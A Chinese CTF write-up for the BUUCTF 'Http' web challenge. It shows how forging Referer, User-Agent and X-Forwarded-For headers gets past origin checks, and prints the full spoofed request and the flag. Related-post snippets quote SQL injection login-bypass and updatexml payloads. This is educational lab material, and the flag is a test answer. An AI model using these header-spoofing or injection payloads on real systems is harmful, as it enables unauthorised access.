2. 程式人生 > 其它 >[BUUCTF][WEB][極客大挑戰 2019]Http 1

[BUUCTF][WEB][極客大挑戰 2019]Http 1

阿新 發佈:2022-12-11
開啟靶機提供的url
右鍵檢視網頁原始碼 發現一個連結 (Secret.php),訪問看看

返回:

It doesn't come from 'https://Sycsecret.buuoj.cn'

這是個題眼

通過burpsuite攔截請求,請求頭新增修改
Referer: https://Sycsecret.buuoj.cn
返回改變為
Please use "Syclover" browser
將header 的User-Agent修改為 Syclover
返回訊息
No!!! you can only read this locally!!!
這是限制了檔案訪問的源地址,可用通過X-Forwarded-For引數來偽造訪問的源地址,這裡可以修改為127.0.0.1或localhost
X-Forwarded-For: 127.0.0.1
boom

得到 flag{6a9a6eb5-b426-4801-a60b-80758db822d9}
最終請求頭(X-Forwarded-For 放最後一行報400,原因未知)

GET /Secret.php HTTP/1.1
Host: node4.buuoj.cn:29872
User-Agent: Syclover
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: https://Sycsecret.buuoj.cn
X-Forwarded-For: 127.0.0.1
Upgrade-Insecure-Requests: 1

相關推薦

[BUUCTF][WEB][挑戰 2019]Http 1

開啟靶機提供的url 右鍵檢視網頁原始碼 發現一個連結 (Secret.php),訪問看看 返回:

[BUUCTF][Web][挑戰 2019]LoveSQL 1

開啟靶機url,頁面顯示有兩個輸入框,框中輸入123\',發現兩個框都有sql注入問題

Buuctf-web-[挑戰 2019]HardSQL

被堵 異或運算子為^ 或者 xor兩個同為真的條件做異或,結果為假,兩個同為假的條件做異或,結果為假,一個條件為真,一個條件為假,結果為真,null與任何條件(真、假、null)做異或,結果都為null

[BUUCTF][Web][挑戰 2019]Secret File 1

開啟靶機對應的url 右鍵檢視網頁原始碼,檢視到一個訪問路徑 /Archive_room.php 構造url訪問一下

BUUCTF-[挑戰 2019]PHP 1

開啟題目,我們就看到這個貓,先是用滑鼠晃了晃,還跟著我的游標搖腦袋。我是來做題的。前端工程師肯定也對這個下功夫了。

BUUCTF-[挑戰 2019]HardSQL 1詳解

來到sql注入騷姿勢,我們一點一點開始學 我們來到這道題,然後嘗試注入,結果發現

BUUCTF-[挑戰 2019]HardSQL 1

使用updatexml報錯法注入 http://1bfb9fee-1fce-4f07-81b1-c8048e473a66.node3.buuoj.cn/check.php?username=admin\'or(updatexml(1,concat(0x7e,version(),0x7e),1))%23&password=21

buuctf:[挑戰 2019]BabySQL

既然是sql注入,先檢視有沒有過濾字元 or union select應該都被過濾了 嘗試繞過方法,發現雙寫可以繞過,先用ununionion seselectlec去判斷有幾列

[挑戰 2019]PHP 1

進入頁面,檢查原始碼之類的都沒資訊,提到了備份,用御劍掃描出www.zip,直接加在url後

[挑戰 2019]BuyFlag 1

本篇文章通過CTF試題-主要內容就是php-strcmp函式繞過,php弱型別比較 [挑戰 2019]BuyFlag 1

[挑戰 2019]HardSQL 1-SQL報錯注入

SQL注入-報錯注入 [挑戰 2019]HardSQL 試題地址:http://94d112f4-9aed-4f3e-b2ff-0c98f30a81b9.node4.buuoj.cn/

[挑戰 2019]Upload 1

1.發現,檔案上傳漏洞 知識點:一個常規上傳題目的知識點:https://www.cnblogs.com/wangtanzhi/p/12243206.html

[挑戰 2019]BabySQL 1

1.發現 1.1隨便輸入,檢視結果。 1.2使用萬能密碼,登入失敗。 /check.php?username=admin\' or \'1\'=\'1&password=1

[挑戰 2019]HardSQL 1

1.發現 1.1開啟題目地址提示為SQL注入,隨便輸入1/\'/\"/, 發現單引號有報錯,雙引號沒有,沒提示有括號,

[挑戰 2019]PHP

題目上說有備份的好習慣,掃描目錄得到www.zip 幾個重要php檔案內容: index.php 1 <?php

[挑戰 2019]BuyFlag

0x01 進入頁面如下 結合題目buyflag的提示,我們點選payflag看看 檢視一下原始碼 發現端倪

[挑戰 2019]BabySQL

解題思路 打開發現是登陸框,先嚐試下二次注入 admin\'# 123456 ,登陸成功,獲取密碼,但是不知道下一步如何利用。

[挑戰 2019]LoveSQL

0x00 開啟網頁 首先試試萬能密碼 賬戶:隨意 密碼:1\' or 1=1# 得到一段加密的密文,應該是MD5,結果找了很多網站也沒能解開

[挑戰 2019]Secret File 思路

絕密檔案,開啟首頁是這個 之後我們開啟原始碼發現了一個頁面,我們跟進去

[挑戰 2019]HardSQL updatexml

報錯注入連結: https://www.cnblogs.com/richardlee97/p/10617115.html報錯原因: 其原因主要是因為虛擬表的主鍵重複。按照MySQL的官方說法,group by要進行兩次運算,第一次是拿group by後面的欄位值到虛擬表中去對